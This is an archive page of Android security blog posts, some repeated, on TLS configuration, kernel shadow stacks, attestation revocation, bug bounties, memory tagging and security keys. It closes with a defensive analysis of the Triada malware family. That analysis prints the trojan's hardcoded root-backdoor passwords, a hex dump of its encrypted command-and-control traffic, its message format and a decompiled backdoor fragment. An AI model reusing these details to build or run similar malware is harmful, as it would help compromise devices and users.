Tag Archives: Android-Security

An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security

banner illustration with several devices and gaming controller

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To ensure apps are safe, apps targeting Android 9 (API level 28) or higher automatically have a policy set by default that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.

Percentage of apps that block cleartext by default.

Since November 1 2019, all app (updates as well as all new apps on Google Play) must target at least Android 9. As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers as part of the pre-launch report.

Example of a warning shown to developers as part of the pre-launch report.

What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set without requiring any extra configuration. Apps can provide an exception to this only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">insecure.example.com</domain>
        <domain includeSubdomains="true">insecure.cdn.example.com</domain>
    </domain-config>
</network-security-config>

If your app needs to be able to accept user specified certificates for testing purposes (for example, connecting to a local server during testing), make sure to wrap your element inside a element. This ensures the connections in the production version of your app are secure.

<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user"/>
        </trust-anchors>
    </debug-overrides>
</network-security-config>

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

Protecting against code reuse in the Linux kernel with Shadow Call Stack


The Linux kernel is responsible for enforcing much of Android’s security model, which is why we have put a lot of effort into hardening the Android Linux kernel against exploitation. In Android 9, we introduced support for Clang’s forward-edge Control-Flow Integrity (CFI) enforcement to protect the kernel from code reuse attacks that modify stored function pointers. This year, we have added backward-edge protection for return addresses using Clang’s Shadow Call Stack (SCS).
Google’s Pixel 3 and 3a phones have kernel SCS enabled in the Android 10 update, and Pixel 4 ships with this protection out of the box. We have made patches available to all supported versions of the Android kernel and also maintain a patch set against upstream Linux. This post explains how kernel SCS works, the benefits and trade-offs, how to enable the feature, and how to debug potential issues.

Return-oriented programming

As kernel memory protections increasingly make code injection more difficult, attackers commonly use control flow hijacking to exploit kernel bugs. Return-oriented programming (ROP) is a technique where the attacker gains control of the kernel stack to overwrite function return addresses and redirect execution to carefully selected parts of existing kernel code, known as ROP gadgets. While address space randomization and stack canaries can make this attack more challenging, return addresses stored on the stack remain vulnerable to many overwrite flaws. The general availability of tools for automatically generating this type of kernel exploit makes protecting against it increasingly important.

Shadow Call Stack

One method of protecting return addresses is to store them in a separately allocated shadow stack that’s not vulnerable to traditional buffer overflows. This can also help protect against arbitrary overwrite attacks.
Clang added the Shadow Call Stack instrumentation pass for arm64 in version 7. When enabled, each non-leaf function that pushes the return address to the stack will be instrumented with code that also saves the address to a shadow stack. A pointer to the current task’s shadow stack is always kept in the x18 register, which is reserved for this purpose. Here’s what instrumentation looks like in a typical kernel function:

SCS doesn’t require error handling as it uses the return address from the shadow stack unconditionally. Compatibility with stack unwinding for debugging purposes is maintained by keeping a copy of the return address in the normal stack, but this value is never used for control flow decisions.
Despite requiring a dedicated register, SCS has minimal performance overhead. The instrumentation itself consists of one load and one store instruction per function, which results in a performance impact that’s within noise in our benchmarking. Allocating a shadow stack for each thread does increase the kernel’s memory usage but as only return addresses are stored, the stack size defaults to 1kB. Therefore, the overhead is a fraction of the memory used for the already small regular kernel stacks.
SCS patches are available for Android kernels 4.14 and 4.19, and for upstream Linux. It can be enabled using the following configuration options:

CONFIG_SHADOW_CALL_STACK=y
# CONFIG_SHADOW_CALL_STACK_VMAP is not set
# CONFIG_DEBUG_STACK_USAGE is not set

By default, shadow stacks are not virtually allocated to minimize memory overhead, but CONFIG_SHADOW_CALL_STACK_VMAP can be enabled for better stack exhaustion protection. With CONFIG_DEBUG_STACK_USAGE, the kernel will also print out shadow stack usage in addition to normal stack usage which can be helpful when debugging issues.

Alternatives

Signing return addresses using ARMv8.3 Pointer Authentication (PAC) is an alternative to shadow stacks. PAC has similar security properties and comparable performance to SCS but without the memory allocation overhead. Unfortunately, PAC requires hardware support, which means it cannot be used on existing devices, but may be a viable option for future devices. For x86, Intel’s Control-flow Enforcement Technology (CET) extension will offer a native shadow stack support, but also requires compatible hardware.

Conclusion

We have improved Linux kernel code reuse attack protections on Pixel devices running Android 10. Pixel 3, 3a, and 4 kernels have both CFI and SCS enabled and we have made patches available to all Android OEMs.

Protecting against code reuse in the Linux kernel with Shadow Call Stack


The Linux kernel is responsible for enforcing much of Android’s security model, which is why we have put a lot of effort into hardening the Android Linux kernel against exploitation. In Android 9, we introduced support for Clang’s forward-edge Control-Flow Integrity (CFI) enforcement to protect the kernel from code reuse attacks that modify stored function pointers. This year, we have added backward-edge protection for return addresses using Clang’s Shadow Call Stack (SCS).
Google’s Pixel 3 and 3a phones have kernel SCS enabled in the Android 10 update, and Pixel 4 ships with this protection out of the box. We have made patches available to all supported versions of the Android kernel and also maintain a patch set against upstream Linux. This post explains how kernel SCS works, the benefits and trade-offs, how to enable the feature, and how to debug potential issues.

Return-oriented programming

As kernel memory protections increasingly make code injection more difficult, attackers commonly use control flow hijacking to exploit kernel bugs. Return-oriented programming (ROP) is a technique where the attacker gains control of the kernel stack to overwrite function return addresses and redirect execution to carefully selected parts of existing kernel code, known as ROP gadgets. While address space randomization and stack canaries can make this attack more challenging, return addresses stored on the stack remain vulnerable to many overwrite flaws. The general availability of tools for automatically generating this type of kernel exploit makes protecting against it increasingly important.

Shadow Call Stack

One method of protecting return addresses is to store them in a separately allocated shadow stack that’s not vulnerable to traditional buffer overflows. This can also help protect against arbitrary overwrite attacks.
Clang added the Shadow Call Stack instrumentation pass for arm64 in version 7. When enabled, each non-leaf function that pushes the return address to the stack will be instrumented with code that also saves the address to a shadow stack. A pointer to the current task’s shadow stack is always kept in the x18 register, which is reserved for this purpose. Here’s what instrumentation looks like in a typical kernel function:

SCS doesn’t require error handling as it uses the return address from the shadow stack unconditionally. Compatibility with stack unwinding for debugging purposes is maintained by keeping a copy of the return address in the normal stack, but this value is never used for control flow decisions.
Despite requiring a dedicated register, SCS has minimal performance overhead. The instrumentation itself consists of one load and one store instruction per function, which results in a performance impact that’s within noise in our benchmarking. Allocating a shadow stack for each thread does increase the kernel’s memory usage but as only return addresses are stored, the stack size defaults to 1kB. Therefore, the overhead is a fraction of the memory used for the already small regular kernel stacks.
SCS patches are available for Android kernels 4.14 and 4.19, and for upstream Linux. It can be enabled using the following configuration options:

CONFIG_SHADOW_CALL_STACK=y
# CONFIG_SHADOW_CALL_STACK_VMAP is not set
# CONFIG_DEBUG_STACK_USAGE is not set

By default, shadow stacks are not virtually allocated to minimize memory overhead, but CONFIG_SHADOW_CALL_STACK_VMAP can be enabled for better stack exhaustion protection. With CONFIG_DEBUG_STACK_USAGE, the kernel will also print out shadow stack usage in addition to normal stack usage which can be helpful when debugging issues.

Alternatives

Signing return addresses using ARMv8.3 Pointer Authentication (PAC) is an alternative to shadow stacks. PAC has similar security properties and comparable performance to SCS but without the memory allocation overhead. Unfortunately, PAC requires hardware support, which means it cannot be used on existing devices, but may be a viable option for future devices. For x86, Intel’s Control-flow Enforcement Technology (CET) extension will offer a native shadow stack support, but also requires compatible hardware.

Conclusion

We have improved Linux kernel code reuse attack protections on Pixel devices running Android 10. Pixel 3, 3a, and 4 kernels have both CFI and SCS enabled and we have made patches available to all Android OEMs.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.
These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.
All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and online certificate status protocol) system was not flexible enough for our needs. So we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.
Our solution is a single TLS-secured URL (https://android.googleapis.com/attestation/status) that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by JSON schema. Only keys that have non-valid status appear in the list, so it is not an exhaustive list of all issued keys.
This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.
The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.

These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.

All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and online certificate status protocol) system was not flexible enough for our needs. So we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.

Our solution is a single TLS-secured URL (https://android.googleapis.com/attestation/status) that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by JSON schema. Only keys that have non-valid status appear in the list, so it is not an exhaustive list of all issued keys.

This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.

The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiably and unambiguous evidence of data abuse, in a similar model as Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or Google Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net as large as a $50,000 bounty.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiably and unambiguous evidence of data abuse, in a similar model as Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or Google Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net as large as a $50,000 bounty.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

Adopting the Arm Memory Tagging Extension in Android

As part of our continuous commitment to improve the security of the Android ecosystem, we are partnering with Arm to design the memory tagging extension (MTE). Memory safety bugs, common in C and C++, remain one of the largest vulnerabilities in the Android platform and although there have been previous hardening efforts, memory safety bugs comprised more than half of the high priority security bugs in Android 9. Additionally, memory safety bugs manifest as hard to diagnose reliability problems, including sporadic crashes or silent data corruption. This reduces user satisfaction and increases the cost of software development. Software testing tools, such as ASAN and HWASAN help, but their applicability on current hardware is limited due to noticeable overheads.

MTE, a hardware feature, aims to further mitigate these memory safety bugs by enabling us to detect them with low overhead. It has two execution modes:

  • Precise mode: Provides more detailed information about the memory violation
  • Imprecise mode: Has lower CPU overhead and is more suitable to be always-on.

Arm recently published a whitepaper on MTE and has added documentation to the Arm v8.5 Architecture Reference Manual.

We envision several different usage modes for MTE.

  • MTE provides a version of ASAN/HWASAN that is easier to use for testing and fuzzing in laboratory environments. It will find more bugs in a fraction of the time and at a lower cost, reducing the complexity of the development process. In many cases, MTE will allow testing memory safety using the same binary as shipped to production. The bug reports produced by MTE will be as detailed and actionable as those from ASAN and HWASAN.
  • MTE will be used as a mechanism for testing complex software scenarios in production. App Developers and OEMs will be able to selectively turn on MTE for parts of the software stack. Where users have provided consent, bug reports will be available to developers via familiar mechanisms like Google Play Console.
  • MTE can be used as a strong security mitigation in the Android System and applications for many classes of memory safety bugs. For most instances of such vulnerabilities, a probabilistic mitigation based on MTE could prevent exploitation with a higher than 90% chance of detecting each invalid memory access. By implementing these protections and ensuring that attackers can't make repeated attempts to exploit security-critical components, we can significantly reduce the risk to users posed by memory safety issues.

We believe that memory tagging will detect the most common classes of memory safety bugs in the wild, helping vendors identify and fix them, discouraging malicious actors from exploiting them. During the past year, our team has been working to ensure readiness of the Android platform and application software for MTE. We have deployed HWASAN, a software implementation of the memory tagging concept, to test our entire platform and a few select apps. This deployment has uncovered close to 100 memory safety bugs. The majority of these bugs were detected on HWASAN enabled phones in everyday use. MTE will greatly improve upon this in terms of overhead, ease of deployment, and scale. In parallel, we have been working on supporting MTE in the LLVM compiler toolchain and in the Linux kernel. The Android platform support for MTE will be complete by the time of silicon availability.

Google is committed to supporting MTE throughout the Android software stack. We are working with select Arm System On Chip (SoC) partners to test MTE support and look forward to wider deployment of MTE in the Android software and hardware ecosystem. Based on the current data points, MTE provides tremendous benefits at acceptable performance costs. We are considering MTE as a possible foundational requirement for certain tiers of Android devices.

Thank you to Mitch Phillips, Evgenii Stepanov, Vlad Tsyrklevich, Mark Brand, and Serban Constantinescu for their contributions to this post.

Use your Android phone’s built-in security key to verify sign-in on iOS devices


Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3


Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.

PHA Family Highlights: Triada



We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by the spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.

History of Triada

Triada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and after getting elevated privileges, it performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. The su binary used by Triada required a password, so was unique compared to regular su binary files common with other Linux systems.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. This is illustrated in the IDA screenshot below. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, ran that concatenation preceded by sh, then ran them as root. Either way, the app had to know the correct password to run the command as root.
This Triada rooting trojan was mainly used to install apps and display ads. This trojan targeted older devices because the rooting exploits didn’t work on newer ones. Therefore, the trojan implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps it first removed all the apps on its blacklist. If more free space was required it would remove all other apps leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was a sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were installed in isolation (that is, not on a day that the device system image was created) and weren’t signed by the OEM or weren’t part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
su binary accepts two passwords
In addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
The underlying data protocol changed periodically. It was either a simple JSON, a list of key-value pairs similar to the properties file, or a proprietary format as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.

When rooting doesn’t work…

During the summer of 2017 we noticed a change in new Triada samples. Instead of rooting the device to obtain elevating privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL+13:
V18 = -1;
LABEL_18:
j___config_log_println(v7, v6, v10, v11, "cf89450001");
if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords. The format is illustrated below.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This app was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and responses to them. The supported commands are shown below in Chinese, a language that was used throughout the Triada app and injection. English translations are given on the right.
  1. 下载请求
  2. 下载结果
  3. 安装请求
  4. 安装结果
  5. 激活请求
  6. 激活结果
  7. 拉活请求
  8. 拉活结果
  9. 卸载请求
  10. 卸载结果
  1. download request
  2. download result
  3. install request
  4. installation result
  5. activation request
  6. activation result
  7. pull request
  8. pull the results
  9. uninstall request
  10. uninstall result
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of Triada

Reverse engineering countermeasures and development

The Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework strings
The strings were encrypted using the algorithm of two XOR loops. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function padding
One final interesting feature of Triada worth mentioning is the development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1) we saw the changes in the code. In the newest version, they substituted MD5 with SHA1. This is used to hash the filenames, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.

OEM outreach

Triada infects device system images through a third-party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third-party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious party
We coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.

Summary

Triada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before the device is sold to the users as well as any time they get updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s harder to infect Android devices, especially if the malware author requires privilege elevation.
